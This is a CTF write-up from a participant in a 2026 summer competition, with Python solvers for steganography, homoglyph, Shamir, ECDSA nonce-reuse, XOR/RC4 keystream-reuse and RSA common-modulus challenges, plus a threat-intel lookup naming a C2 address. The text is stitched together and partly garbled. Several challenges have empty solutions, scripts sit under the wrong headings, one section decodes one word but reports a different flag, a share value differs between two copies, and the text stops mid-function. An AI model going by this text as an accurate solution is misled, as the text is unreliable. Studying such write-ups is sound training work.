Selected challenges from the Polar summer competition

PolarCTF Cybersecurity 2026 Summer Individual Challenge

WRITE UP

Participant: lllxxy


Part 1: MISC

1-1 Lost Data Stream

The approach for this challenge is as follows:

1-2 这一个记

The approach for this challenge is as follows:

1-3 Phantom Trace

The approach for this challenge is as follows:

Download the txt file to obtain the following information.

Phantom Trace 1

Challenge text: Intelligence indicates that the report's author hid a secret message in the report-number field. Extract the hidden message and submit it in all uppercase letters. Flag format: flag{the all-uppercase message you extracted}

Download the attachment and then write the script:

```python
from itertools import combinations
from math import gcd
from sympy import Matrix

shares = []  # paste your shares here as (x, y) tuples


def try_det_mod(points):
    """
    Build a 6x6 matrix with rows 1, x, x^2, x^3, x^4, y.
    The determinant is always a multiple of p (in the ideal case).
    """
    M = []
    for x, y in points:
        M.append([1, x, x**2, x**3, x**4, y])
    return abs(int(Matrix(M).det()))


def recover_p(shares):
    g = 0
    cnt = 0
    # Use more combinations for better stability
    for comb in combinations(shares, 6):
        det = try_det_mod(comb)
        if det == 0:
            continue
        g = det if g == 0 else gcd(g, det)
        cnt += 1
        if cnt > 30:
            break
    print("+ raw gcd:", g)
    if g == 0:
        # No usable determinant (for example, fewer than 6 shares);
        # without this guard the loop below would never terminate.
        return 0
    # Strip small factors left over in the gcd
    for f in [2, 3, 5, 7, 11, 13, 17]:
        while g % f == 0:
            g //= f
    return g


p = recover_p(shares)
print("+ candidate p:", p)
print("+ bit length:", p.bit_length())
```

```python
from Crypto.Util.number import long_to_bytes

# =========================
# Known prime p
# =========================
p = 24311210375776326281883328971888384571190348544937819934107768024324957052873457462020928159962325094070750863794240977882920383930006938974055238384664853

# =========================
# shares (11 points)
# =========================
shares = [
    (13825276559652663759456053593154923232020771238254924190105602129554442740903032538098062820337983638666056784818726026705226866679025611690838448584570200, 19012813120561778249910002377121545519300396863416796577430580565668955435109529853661026703963191587511794739652897381447200605465672082042748885989744402),
    (14989248861487876756545923532577464423717630626792629221618966203158382671849012765703938440292173459828333463382287156647477649833759229415415422006446622, 1656433892597578744823177014342869528132831200379451998967521640131825487494819099422022469838825418150730143438520616267294835254347450196350209174872775),
    (19193170771688324398963345493388616208257949680877900104979298799760166459827906171423469189582755008620842357080263827095038929588780308148621589260541422, 11420248910634302383712371357580971808319584342845033562709305079257609558334879243688210930475525301635690020652329269939235513202907874912193579010147639),
    (18777091659417137576603135959549361738394745875776533930983699353415679891339311594674388484175296875080132898946694787449577170540182756514019328107408039, 9704588552249224055741700389530593621449542838333557625043239604844884216427066269916242710825967541084869521646880935759182920024727659925664328119325004),
    (14287513785577058854224398359692453526128916947865468956393138998889401907577994975977127911557142483281724809006107854288358113197720626510491043303548938, 9770438332979961381243902918934813992264072842817997713173849346168822219848231350591767294014602573834792519783840064045899272301954841421098105680418195),
    (15119386315728257486056813314318552552131776852359374571135536516700837163067296684378970563219592314591010021093834609706121742207654051417055052071557349, 16692084219568517724580051441903204713362782163474624605007356230785148566081431738623045160758806438045544385291581669748734947320653414449300238328109834),
    (21639299360306429790518264840030705977452919783601050938080982219887611170051387045460766025557892361751023229841353839566899377685975938928635556686547189, 12343877060822660195641885868676444926185745514478427502000391547786522673431926278446194312565987755951555714259193644278522945366156482829701926440766436),
    (17403781572025005208843063451017304109237698250797299652792725200086960681154790951373046337507380799261125197889969541906772099793896620488753295096504560, 19150670008423170996379784798328231445600406963296913739761096531018281916219407400122538102243817197525100016408303024079773707274831692716031708315774805),
    (13712268494862445248911494067355982992182490419234876397649838374491191895372155289722641937870164145755937780023138602530807219076237280105050726711219910, 1791011308314909339397751948386556426199638075952445414959762706679206743326931052440210268620207102528545976021104436487643745311936337923164621066436060),
    (21991384930267151269802069003579123930799446461196461214557072106672776944086736799413877206434356469442093165424509519266137102480781842658606739163403874, 14963223947878308999984311524851337448763815509922889823520921933718980739751743032849959416282177018557805255468910634606302831448277324417065732420585144),
    (20641737678873745759238644473878987874377780512320373213801366359879139450580105650792376384552918292291784843752265971609206700166575172878621369499660576, 21115775840010891534972527491920868611647594882864057129786366769672854596717667891296204137876321305451520048412806215332780594549883808548319082816815511),
]


# =========================
# Lagrange interpolation (evaluate f(0))
# =========================
def lagrange_at_zero(points, p):
    secret = 0
    k = len(points)
    for i in range(k):
        xi, yi = points[i]
        num, den = 1, 1
        for j in range(k):
            if i == j:
                continue
            xj = points[j][0]
            num = (num * (-xj)) % p
            den = (den * (xi - xj)) % p
        inv_den = pow(den, -1, p)
        li = num * inv_den % p
        secret = (secret + yi * li) % p
    return secret


# =========================
# Recover the secret
# =========================
secret_int = lagrange_at_zero(shares[:5], p)
flag = long_to_bytes(secret_int)
print("+ secret int:", secret_int)
print("+ flag:", flag.decode())
```

This gives the flag for Phantom Trace 1: flag{FALSEREPORT}

Phantom Trace 2

Challenge text: Section 5 of the attachment, "Analyst Notes", contains 7 notes. Look closely at the end of each note's line: the identity marker of an insider is hidden there. Decode the 7-character English word and submit it. Flag format: flag{ALL-UPPERCASE WORD}

The hidden information sits in the zero-width characters (Unicode U+200B and U+200C) that follow the "Report Number" field.

Decoding method:

U+200B (zero-width space) → 0
U+200C (zero-width non-joiner) → 1

Convert to ASCII in groups of 8 bits.

The resulting binary:

01000110 01000001 01001100 01010011 01000101 01010010 01000101 01010000 01001111 01010010 01010100

Corresponding ASCII:

F A L S E R E P O R T

So the hidden message (submitted in all uppercase, as the challenge requires) is: FALSEREPORT

Finally, the second flag is flag{INSIDER}

Phantom Trace 3

Challenge text: The IOC list in the attachment contains several domains. One of them uses a homoglyph: it looks exactly like another domain but uses a character from a different alphabet. Find the Unicode code point of that homoglyph, in the format `U+XXXX` (4 hexadecimal digits, uppercase). Flag format: flag{U+XXXX}

The 1st and 3rd domains in the IOC list look identical, but the letter e in the 3rd domain is actually the Cyrillic letter е (U+0435), not the Latin letter e (U+0065).

So the Unicode code point used for the homoglyph attack gives the flag: flag{U+0435}

Phantom Trace 4

Challenge text: Section 2 of the attachment lists the MITRE ATT&CK technique mapping for this attack. One technique ID in the table has been deliberately written wrong: its tactic description does not match the actual technique number. Consult the official MITRE ATT&CK framework, find the wrong technique ID, and write the correct one. Flag format: flag{correct technique ID} (for example: flag{T1234.567})

Spearphishing Attachment: this technique belongs to the TA0001 Initial Access tactic. T1566.001 is defined as follows: the attacker sends a spearphishing email with a malicious attachment and lures the target into opening the attachment in order to execute malicious code or exploit a vulnerability.

Final flag: flag{T1566.001}

Phantom Trace 5

Challenge text: Combine all the clues in the attachment (the hidden message, the homoglyph domain, the ATT&CK error and the false-flag marker) and answer the following questions:

5a. Which of the following is this threat intelligence report itself most likely to be?
- A) A genuine APT attack analysis report
- B) A report disguised after the fact by a red team / penetration test
- C) A report fabricated by a vendor for marketing purposes
- D) False intelligence deliberately spread by the attacker (counter-attribution / intelligence pollution)

5b. Summarize in one English word the most important piece of evidence supporting your answer to 5a (distilled from the hidden information or the data anomalies).

5c. Of the three discrepancies mentioned in the attachment, which one is most likely a counter-attribution false flag planted deliberately by the attacker? Write the key characteristic word of that discrepancy as it appears in the attachment.

Flag format: flag{option letter_key evidence word_false-flag characteristic word}
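A defender-side check for the two Unicode tricks described in Phantom Trace 2 and 3, as an added example that is not part of the original write-up: it decodes a U+200B/U+200C payload from a text field and reports letters from a foreign script inside a domain name. The report line, the `.example` domains and all function names are constructed for illustration.

```python
import unicodedata

# Bit mapping stated in the write-up: U+200B -> 0, U+200C -> 1.
ZW_BITS = {"\u200b": "0", "\u200c": "1"}


def hide(message: str) -> str:
    """Build a constructed zero-width payload: 8 bits per ASCII character."""
    bits = "".join(f"{ord(c):08b}" for c in message)
    return "".join("\u200b" if b == "0" else "\u200c" for b in bits)


def extract_zero_width(text: str) -> str:
    """Collect the zero-width characters in text and decode them as 8-bit ASCII."""
    bits = "".join(ZW_BITS[c] for c in text if c in ZW_BITS)
    usable = len(bits) - len(bits) % 8  # ignore an incomplete trailing byte
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def strip_zero_width(text: str) -> str:
    """Return the text as a reader sees it, without the hidden characters."""
    return "".join(c for c in text if c not in ZW_BITS)


def letter_script(ch: str) -> str:
    # First word of the Unicode character name, e.g. LATIN, CYRILLIC, GREEK.
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def foreign_letters(domain: str, expected: str = "LATIN") -> list:
    """Code points of letters in the domain that are not from the expected script."""
    return [f"U+{ord(c):04X}" for c in domain
            if c.isalpha() and letter_script(c) != expected]


def audit(report_line: str, domains: list) -> dict:
    """Run both checks over one text field and a list of IOC domains."""
    flagged = {}
    for d in domains:
        hits = foreign_letters(d)
        if hits:
            flagged[d] = hits
    return {
        "visible_text": strip_zero_width(report_line),
        "hidden_message": extract_zero_width(report_line),
        "homoglyphs": flagged,
    }


# Constructed sample data (not taken from the challenge attachment).
SAMPLE_REPORT_LINE = "Report Number: TI-0000" + hide("FALSEREPORT")
SAMPLE_DOMAINS = [
    "update-portal.example",
    "cdn-sync.example",
    "updat\u0435-portal.example",  # Cyrillic U+0435 in place of Latin e
]

if __name__ == "__main__":
    result = audit(SAMPLE_REPORT_LINE, SAMPLE_DOMAINS)
    print(result["visible_text"])
    print(result["hidden_message"])
    for domain, points in result["homoglyphs"].items():
        print(domain.encode("unicode_escape").decode(), points)
```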

1-4 FalseSight

The approach for this challenge is as follows:

1-5 DNS Covert Channel

The approach for this challenge is as follows:

During a routine audit, the security team captured a stretch of anomalous traffic from the internal host 192.168.10.55. The host is suspected of having a trojan implanted and of covertly sending sensitive data out over the DNS protocol. Analyze the capture, reconstruct the stolen data, and obtain the flag.

Final flag: flag{dns_exf1l_tr4ff1c_4n4lys1s}

1-6 Silent Tracking

The approach for this challenge is as follows:

Complete summary of the solution:

1. Reading the key hints

"The information is not in the files, but in the relationships between the files" → several fragment files have to be combined
"The weight of the fragments determines the pace" → file size determines the order and method of reassembly

2. Analysis

Step 1: Identify the ZIP file header
- frame_03.bin starts with 50 4B 03 04 (PK..) → ZIP local file header
- Parsed from the ZIP header: file name length 9 bytes, file content length 45 bytes

Step 2: Reassemble the file name
- The file name in the ZIP header starts with fi
- frame_01.bin starts with nal.txt
- Concatenated: fi + nal.txt = final.txt

Step 3: Reassemble the file content
- The ZIP header shows a content length of 45 bytes
- frame_01.bin has 25 bytes left after nal.txt is removed
- The first 20 bytes of frame_05.bin complete it
- Full content: ==QfmJneuV2cfNHMfFmY2dmb5JXZfdWYylndmtHdul3c

Step 4: Base64 decoding
- Reverse the string: c3ludHtmdnlyYWdfZXJ5bmd2YmFfMHNfc2VuenJmfQ==
- Base64 decode: synt{fvyrag_eryngvba_0f_senzrf}

Step 5: ROT13 decoding
- synt → flag
- fvyrag → silent
- eryngvba → relation
- 0f → 0f
- senzrf → frames

3. Final flag

flag{silent_relation_0f_frames}
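The reassembly in steps 1 to 5, as an added example that is not part of the original write-up: it reads the name and content lengths from the ZIP local file header, cuts the entry out of the joined fragments, uses the header CRC-32 to confirm the fragment order, and then applies the reverse, Base64 and ROT13 steps. The three frames are constructed stand-ins split as the write-up describes; the trailing newline that brings the content to 45 bytes, the filler bytes and all function names are assumptions.

```python
import base64
import codecs
import struct
import zlib

# ZIP local file header: signature, version, flags, method, time, date,
# CRC-32, compressed size, uncompressed size, name length, extra length.
LFH = struct.Struct("<4s5H3I2H")  # 30 bytes


def build_constructed_frames():
    """Constructed stand-ins for frame_03.bin, frame_01.bin and frame_05.bin."""
    # 44 Base64 characters from the write-up plus an assumed newline (45 bytes).
    content = b"==QfmJneuV2cfNHMfFmY2dmb5JXZfdWYylndmtHdul3c\n"
    name = b"final.txt"
    header = LFH.pack(b"PK\x03\x04", 20, 0, 0, 0, 0,
                      zlib.crc32(content), len(content), len(content),
                      len(name), 0)
    frame_03 = header + name[:2]                 # header + "fi"
    frame_01 = name[2:] + content[:25]           # "nal.txt" + 25 content bytes
    frame_05 = content[25:] + b"\x00" * 12       # last 20 bytes + filler
    return [frame_03, frame_01, frame_05]


def reassemble(frames):
    """Join fragments in the given order and cut out the stored ZIP entry."""
    stream = b"".join(frames)
    if len(stream) < LFH.size:
        raise ValueError("too short for a ZIP local file header")
    (sig, _ver, _flags, method, _time, _date,
     crc, csize, _usize, nlen, elen) = LFH.unpack_from(stream)
    if sig != b"PK\x03\x04":
        raise ValueError("first fragment is not a ZIP local file header")
    if method != 0:
        raise ValueError("only stored (uncompressed) entries are handled")
    name = stream[LFH.size:LFH.size + nlen].decode("ascii", errors="replace")
    start = LFH.size + nlen + elen
    data = stream[start:start + csize]
    if len(data) != csize:
        raise ValueError("fragments are shorter than the declared size")
    if zlib.crc32(data) != crc:
        # A wrong fragment order or a wrong cut shows up here.
        raise ValueError("CRC-32 mismatch: fragment order is wrong")
    return name, data


def decode_payload(data: bytes) -> str:
    """Reverse the string, Base64-decode it, then apply ROT13."""
    reversed_b64 = data.strip()[::-1]
    rot13_text = base64.b64decode(reversed_b64).decode("ascii")
    return codecs.decode(rot13_text, "rot_13")


if __name__ == "__main__":
    file_name, payload = reassemble(build_constructed_frames())
    print(file_name, len(payload))
    print(decode_payload(payload))
```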

1-7 Shattered-Shadow Coordinate Code Trace

The approach for this challenge is as follows:

1-8 miscwei

The approach for this challenge is as follows:

Open this URL:

```json
{"data":{"C2 地址":"111.229.26.3:51982","VT 检出率":"42/72","关联组织":"DarkLynx (APT)","备注":"该家族通常配合 CobaltStrike Beacon 使用","家族":"DarkLynx Downloader","文件名":"salary_report_2024.xlsm","类型":"VBA Macro Loader","首次上传":"2024-06-10"},"query":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","status":"found"}
```

Final information gathering:

```json
{"data":{"MITRE ATT&CK":{"C2":"T1071.001 (Web 协议)","凭据窃取":"T1003.001 (LSASS Dump)","初始访问":"T1566.001 (鱼叉钓鱼附件)","执行":"T1204.002 (恶意宏)","持久化":"T1547.001 (注册表 Run 键)","提权":"CVE-2024-0610","数据外传":"T1041 (C2 信道)"},"别名":["DLNX","ATK-47"],"动机":"网络间谍 / 知识产权窃取","已知漏洞":["CVE-2024-0610 (权限提升)","CVE-2023-23397 (Outlook NTLM 泄露)"],"常用工具":["CobaltStrike Beacon","Mimikatz","PoisonIvy 变种"],"活跃区域":"亚太地区","特征":"惯用非标准端口、伪装 Windows Update 通信、鱼叉钓鱼投放 XLSM","组织全称":"DarkLynx (暗夜山猫)"},"query":"DarkLynx","status":"found"}
{"data":{"Beacon 模式":"异步回调","C2 协议":"HTTP/HTTPS Malleable C2","关联组织":"DarkLynx, APT29, FIN7 等","类型":"商业渗透测试框架(被恶意使用)","默认端口":"50050 (TeamServer)"},"query":"CobaltStrike","status":"found"}
{"data":{"关联组织":"DarkLynx","协议":"HTTP","备注":"非标准端口,用于绕过 IDS 检测","工具":"CobaltStrike Malleable C2","服务":"C2 Beacon 监听端口"},"query":"51982","status":"found"}
```

This gives the flag: flag{DarkLynx_CobaltStrike_CVE-2024-0610}

Part 2: CRYPTO

2-1 Sign-in

The approach for this challenge is as follows:

Challenge text: On a programmer's computer you find a file named 'flag.txt' that contains nothing but a string of mysterious numbers:

Ciphertext: 102 108 97 103 123 112 111 108 97 114 99 116 102 125

Hint: In the world of computers there are only 0 and 1.

The challenge is about converting binary to decimal (the numbers are ASCII codes written in decimal).

flag{polarctf}

2-2 A Love Letter

The approach for this challenge is as follows:

Extract the archive. The private key is then recovered from the two ECDSA signatures that share the same nonce k (SHA-256 hash, secp256k1 parameters). The calculation:

1. Compute h1 = SHA256("I love you, Li!") and h2 = SHA256("Will you be my girlfriend?")
2. k = (h1 - h2) * inv(s1 - s2) mod n
3. d = (s1 * k - h1) * inv(r) mod n

The script:

```python
import hashlib

# secp256k1 parameter (group order)
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

# Known data
r = 0x2a4c6e8f0a2b4c6d8e0f2a4c6e8f0a2b4c6d8e0f2a4c6e8f0a2b4c6d8e0f2a4c
s1 = 0x4c2e1a3b5d7f9e8c6a4b2d1e3f5a7c9b8e6d4f2a1c3e5b7d9f0a2c4e6f8a0b2c
s2 = 0x9a8c6e4d2b0f1e3c5a7b9d8e6f4a2c0d1e3f5a7b9c8d6e4f2a0b1c3d5e7f9a8b
msg1 = "I love you, Li!"
msg2 = "Will you be my girlfriend?"

# Compute the message hashes
h1 = int(hashlib.sha256(msg1.encode('utf-8')).hexdigest(), 16)
h2 = int(hashlib.sha256(msg2.encode('utf-8')).hexdigest(), 16)
print(f"h1: {hex(h1)}")
print(f"h2: {hex(h2)}")


# Modular inverse
def mod_inverse(a, m):
    return pow(a, -1, m)


# Recover the nonce k
k = ((h1 - h2) * mod_inverse(s1 - s2, n)) % n
print(f"k: {hex(k)}")

# Recover the private key d
d = ((s1 * k - h1) * mod_inverse(r, n)) % n
print(f"私钥 d: {hex(d)}")

# Print the flag
print(f"flag{{{hex(d)[2:]}}}")
```

Final result: flag{734fc83fb33713821e4c3bc3b7c2968d585ec299976e4a19bb94feaa072e0a52}

2-3 XOR Stream Cipher Key Reuse

The approach for this challenge is as follows:

This challenge exploits the weakness of a repeating-key XOR stream cipher: when the same keystream is used to encrypt two different messages, an attacker who knows one of the plaintexts can recover the key through known plaintext ⊕ ciphertext 1 = keystream and then decrypt ciphertext 2 directly.

In the challenge the key is 16 bytes long and is reused (there is no random nonce/IV), which is exactly the b'P\xac@[\x86\xaf\xa30\xdat\x12\xae/6\xba\xc6' you computed.

The known-plaintext fragment you mentioned, "The quick brown fox...", is about 74 bytes, which is enough to cover a full period of the 16-byte key (in practice the key pattern can be verified after a few periods).

The key is then extended to the length of ciphertext 2 (44 bytes) and XORed with it to obtain the flag.

Script:

```python
# XOR stream cipher key-reuse attack script
# Recover the keystream from the known plaintext, then decrypt the flag
ct1_hex = "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"
ct2_hex = "36c0213cfdd79342850621db5c53e5ab64c72528d9dcd742e9157ff14c07caae63de1f6ae8dcc653af0677d3"

# Convert to bytes
ct1 = bytes.fromhex(ct1_hex)
ct2 = bytes.fromhex(ct2_hex)

# Known plaintext (its length must be 380 bytes)
known_plaintext = b"The quick brown fox jumps over the lazy dog. " * 8 + b"This is a classic pangram used in cryptography challenges to demonstrate stream cipher key reuse vulnerabilities."

# Make sure the length is correct
known_plaintext = known_plaintext[:380]
assert len(known_plaintext) == 380

# Recover the first 380 bytes of keystream (in fact a repeating 16-byte key)
keystream = bytes(a ^ b for a, b in zip(known_plaintext, ct1))

# Extract the 16-byte key (repeating pattern)
key = keystream[:16]
print("恢复的密钥 (16 bytes):", key)

# Build the keystream needed for the flag
keystream_for_flag = (key * (len(ct2) // len(key) + 2))[:len(ct2)]

# Decrypt the flag
flag = bytes(a ^ b for a, b in zip(keystream_for_flag, ct2))
print("Flag:", flag.decode('utf-8'))
```

The flag is: flag{x0r_r3use_m4kes_str3am_c1ph3r_1nsecure}

2-4 RC4

The approach for this challenge is as follows:

Extracting the archive gives the idea: both ciphertexts were encrypted with the same RC4 keystream (standard KSA + PRGA), so c1 ^ c2 is directly p1 ^ p2.

If one of the plaintexts is guessed to be "this_is_the_key!" (obtained by decoding the provided key string and applying a Caesar shift), XOR immediately yields the other plaintext, which is the flag.

The only modification in the challenge is the way the "obfuscated key" is presented; the RC4 core algorithm is still the standard implementation.

The script:

```python
#!/usr/bin/env python3
# RC4 two-ciphertext XOR attack script
# Known: c1 = p1 ^ ks, c2 = p2 ^ ks, so p2 = p1 ^ (c1 ^ c2)
# Guessing p1 = "this_is_the_key!" gives p2, which is the flag
import base64


def main():
    # Ciphertexts (hex strings)
    c1_hex = "63dc968e6fbd78425b1aa80deca5dddd5bc2773d4c11bf3a"
    c2_hex = "71d89e9a4b8648297043be0de9f0d0a328f228557863db47"

    # Convert to bytes
    c1 = bytes.fromhex(c1_hex)
    c2 = bytes.fromhex(c2_hex)
    print(f"c1 长度: {len(c1)} 字节")
    print(f"c2 长度: {len(c2)} 字节")

    # Guessed plaintext p1
    p1_guess = b"this_is_the_key!"
    print(f"猜测 p1: {p1_guess}")
    print(f"p1 长度: {len(p1_guess)} 字节")

    # Compute c1 ^ c2
    xor_length = min(len(c1), len(c2))
    c1_xor_c2 = bytes(c1[i] ^ c2[i] for i in range(xor_length))

    # Compute p2 = p1 ^ (c1 ^ c2)
    min_len = min(len(p1_guess), xor_length)
    p2 = bytes(p1_guess[i] ^ c1_xor_c2[i] for i in range(min_len))
    print(f"\n解密出的 p2 前 {min_len} 字节: {p2}")
    print(f"ASCII 形式: {p2.decode('ascii', errors='ignore')}")

    # If p1 is shorter than the ciphertext, recover the remaining part too
    if len(c1) > len(p1_guess):
        # The RC4 keystream does not repeat every len(p1) bytes, so the
        # keystream recovered from p1 cannot be reused cyclically for the tail.
        # Assumption: p1 is padded with zero bytes up to the ciphertext length,
        # so the tail of c1 ^ c2 is already the tail of p2.
        remaining = c1_xor_c2[len(p1_guess):]
        print(f"\n剩余部分解密: {remaining}")

        # Join the complete p2
        full_p2 = p2 + remaining
        print(f"\n完整 p2: {full_p2}")
        print(f"完整 flag: {full_p2.decode('ascii', errors='ignore')}")

    # Check how the key was processed (optional)
    key_hex = "64327473646C3973646C393361326866626D686949513D3D"
    key_bytes = bytes.fromhex(key_hex)
    print(f"\n原始 key 十六进制: {key_hex}")
    print(f"Key 解码 (尝试1 - 直接ASCII): {key_bytes.decode('ascii', errors='ignore')}")

    # Try Base64 decoding
    try:
        key_b64_str = key_bytes.decode('ascii')
        real_key = base64.b64decode(key_b64_str)
        print(f"Key Base64 解码: {real_key.hex()} -> {real_key}")
        print(f"Key 长度: {len(real_key)} 字节 (符合 ≤16)")
    except Exception:
        print("Base64 解码失败")


if __name__ == "__main__":
    main()
```

This gives flag{RC4_1s_n0t_s0_h4rd}

2-5 RSA攻击

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
Approach: Extract the archive. Use the common modulus attack (same modulus, different public exponents, gcd(e1, e2) = 1) to recover the plaintext directly.

Script:

```python
n = 13812575233672721831586447583537566876653330486388935409787324333890787459392340450466602667504564680439365520897560873428017286096972445000317824251067352767983648512628776119679123400768824503694790917456261015793839979622036029611045745581363369351857864086686963496317673425630514828633413586909763949795187270764002509197362846908721600263590407640239331435797743946639068968182530714992497969629250766233642006666869043197198488505558710080081572718303651084249757629984467851536523131561671672489611342354506102975683280634931335250787164325776630303410430197355308594589794345127372612129749874742848505962957
c1 = 6070418361005764781666022160782201020887766530217726892023574250703991153557153150240365562631823866925399109653692772429273414466157925616984969604480345833056708745589264326707421262501098443511684348192232914773363078866001499635599832817468918612502325969087574855976873314002597693535529314223131401211725375960723298442955172141723469659923837266222074788068850377594521429498262678342651354197024627444164288711810799491130391148471163552225195175015155522706829274469375372001014646432745594081482121724200720169564704735134585990761451469788279800252372582853001296020279841151437121368396563208194238176809
c2 = 10333074300444651393936782269258556921403986428158959194325049613051485082847482400799333224207225002899420584885380779122331681690914097226669296406031455480685880093806047826997202684091610029196843015145312932541842991056212933838748027848354582851989374719190041121737024050736144878626494196879779470357938007923163393755461501521926143809013879106438359634585413111911930506853827052788328813877660360961030885521473428344868672139024952576892377942170827101770540081503574982983989347495232393714702165354007286096839200607023742050117961927827236261835001175781713994427455900056065253089202845028635992697862


def mod_inverse(a, m):
    # Iterative extended Euclid: returns a^-1 mod m (a and m must be coprime)
    m0, x0, x1 = m, 0, 1
    if m == 1:
        return 0
    while a > 1:
        q = a // m
        m, a = a % m, m
        x0, x1 = x1 - q * x0, x0
    if x1 < 0:
        x1 += m0
    return x1


# e1 = 65537, e2 = 17
# 65537 * (-8) + 17 * 30841 = 1
c1_8 = pow(c1, 8, n)
inv_c1_8 = mod_inverse(c1_8, n)   # c1^(-8) mod n
c2_pow = pow(c2, 30841, n)
m = (c2_pow * inv_c1_8) % n
flag = m.to_bytes((m.bit_length() + 7) // 8, 'big')
print(flag)
```

Final flag: flag{c0mm0n_m0dulus_1s_d4ng3r0us}
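The script above hard-codes the Bézout coefficients -8 and 30841 for e1 = 65537, e2 = 17. The following added example (not part of the original write-up) generalises it: the coefficients are derived with the extended Euclidean algorithm for any coprime exponent pair, and a small audit helper flags keys that share a modulus. The toy primes, the message and the key names are constructed for the demonstration.

```python
from collections import defaultdict


def egcd(a, b):
    """Return (g, s, t) such that a*s + b*t == g == gcd(a, b)."""
    old_r, r, old_s, s, old_t, t = a, b, 1, 0, 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return old_r, old_s, old_t


def common_modulus_recover(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 mod n and c2 = m^e2 mod n when gcd(e1, e2) == 1."""
    g, s, t = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents share a factor; m is not recovered directly")
    # One of s, t is negative. pow() with a negative exponent and a modulus
    # (Python 3.8+) inverts the base mod n first, so
    # c1^s * c2^t = m^(e1*s + e2*t) = m (mod n).
    return pow(c1, s, n) * pow(c2, t, n) % n


def moduli_reused(public_keys):
    """Audit helper: map each modulus used with more than one exponent to its key names.

    public_keys is an iterable of (name, n, e) tuples (hypothetical inventory format).
    """
    by_n = defaultdict(dict)
    for name, n, e in public_keys:
        by_n[n][name] = e
    return {n: sorted(names) for n, names in by_n.items()
            if len(set(names.values())) > 1}


# Constructed toy parameters: two Mersenne primes, far too small for real use.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
E1, E2 = 65537, 17
M = int.from_bytes(b"reuse_n", "big")      # constructed 7-byte message, coprime to N
C1, C2 = pow(M, E1, N), pow(M, E2, N)      # the same message under both exponents


def demo():
    """Recover the message from the two ciphertexts alone (no private key)."""
    m = common_modulus_recover(N, E1, C1, E2, C2)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(demo())
    print(moduli_reused([("alice", N, E1), ("bob", N, E2), ("carol", P * 7, E1)]))
```

The mitigation is to generate a fresh modulus for every key pair; the audit helper is the check to run over an existing key inventory.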

2-6 Shamir

Approach: Extract the archive.

Idea: this is a Shamir's Secret Sharing scheme with parameters (k=5, n=11); the secret is the flag (converted to a long integer). The challenge hides p (a large prime), so we first have to recover p and then use any 5 shares with Lagrange interpolation to recover the secret (the constant term).

Script:

```python
from Crypto.Util.number import long_to_bytes

# Recovered prime p
p = 24311210375776326281883328971888384571190348544937819934107768024324957052873457462020928159962325094070750863794240977882920383930006938974055238384664853

# 11 shares (x, y)
shares = [
    (13825276559652663759456053593154923232020771238254924190105602129554442740903032538098062820337983638666056784818726026705226866679025611690838448584570200, 19012813120561778249910002377121545519300396863416796577430580565668955435109529853661026703963191587511794739652897381447200605465672082042748885989744402),
    (14989248861487876756545923532577464423717630626792629221618966203158382671849012765703938440292173459828333463382287156647477649833759229415415422006446622, 1656433892597578744823177014342869528132831200379451998967521640131825487494819099422022469838825418150730143438520616267294835254347450196350209174872775),
    (19193170771688324398963345493388616208257949680877900104979298799760166459827906171423469189582755008620842357080263827095038929588780308148621589260541422, 11420248910634302383712371357580971808319584342845033562709305079257609558334879243688210930475525301635690020652329269939235513202907874912193579010147639),
    (18777091659417137576603135959549361738394745875776533930983699353415679891339311594674388484175296875080132898946694787449577170540182756514019328107408039, 9704588552249224055741700389530593621449542838333557625043239604844884216427066269916242710825967541084869521646880935759182920024727659925664328119325004),
    (14287513785577058854224398359692453526128916947865468956393138998889401907577994975977127911557142483281724809006107854288358113197720626510491043303548938, 9770438332979961381243902918934813992264072842817997713173849346168822219848231350591767294014602573834792519783840064045899272301954841421098105680418195),
    (15119386315728257486056813314318552552131776852359374571135536516700837163067296684378970563219592314591010021093834609706121742207654051417055052071557349, 16692084219568517724580051441903204713362782163474624605007356230785148566081431738623045160758806438045544385291581669748734947320653414449300238328109834),
    (21639299360306429790518264840030705977452919783601050938080982219887611170051387045460766025557892361751023229841353839566899377685975938928635556686547189, 12343877060822660195641885868676444926185745514478427502000391547786522673431926278446194312565987755982555714259193644278522945366156482829701926440766436),
    (17403781572025005208843063451017304109237698250797299652792725200086960681154790951373046337507380799261125197889969541906772099793896620488753295096504560, 19150670008423170996379784798328231445600406963296913739761096531018281916219407400122538102243817197525100016408303024079773707274831692716031708315774805),
    (13712268494862445248911494067355982992182490419234876397649838374491191895372155289722641937870164145755937780023138602530807219076237280105050726711219910, 1791011308314909339397751948386556426199638075952445414959762706679206743326931052440210268620207102528545976021104436487643745311936337923164621066436060),
    (21991384930267151269802069003579123930799446461196461214557072106672776944086736799413877206434356469442093165424509519266137102480781842658606739163403874, 14963223947878308999984311524851337448763815509922889823520921933718980739751743032849959416282177018557805255468910634606302831448277324417065732420585144),
    (20641737678873745759238644473878987874377780512320373213801366359879139450580105650792376384552918292291784843752265971609206700166575172878621369499660576, 21115775840010891534972527491920868611647594882864057129786366769672854596717667891296204137876321305451520048412806215332780594549883808548319082816815511),
]


def mod_inverse(a, m):
    """Modular inverse via the extended Euclidean algorithm"""
    def egcd(a, b):
        if a == 0:
            return b, 0, 1
        g, y, x = egcd(b % a, a)
